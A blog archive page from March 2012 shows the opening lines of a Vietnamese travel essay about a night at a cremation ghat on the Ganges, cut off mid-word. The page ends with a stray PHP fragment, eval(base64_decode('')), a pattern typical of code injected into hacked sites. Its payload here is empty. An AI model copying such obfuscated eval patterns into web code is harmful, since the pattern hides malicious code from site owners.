Archive for March 16th, 2012

ĐÊM NGHE SÔNG HẰNG HÁT

ĐÊM NGHE SÔNG HẰNG HÁT

Khi chiếc ghe đưa chúng tôi trở lại Ghat thiêu người, khoảng mười giờ tối, xác người đàn bà quấn vải trắng không còn nằm trên bờ sông nữa. Bà có thể vừa hay đang được hỏa thiêu. Giàn hỏa là một lò lửa thấp chất đầy những t

03.16.2012 | Ký-Truyện-Tùy Bút |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>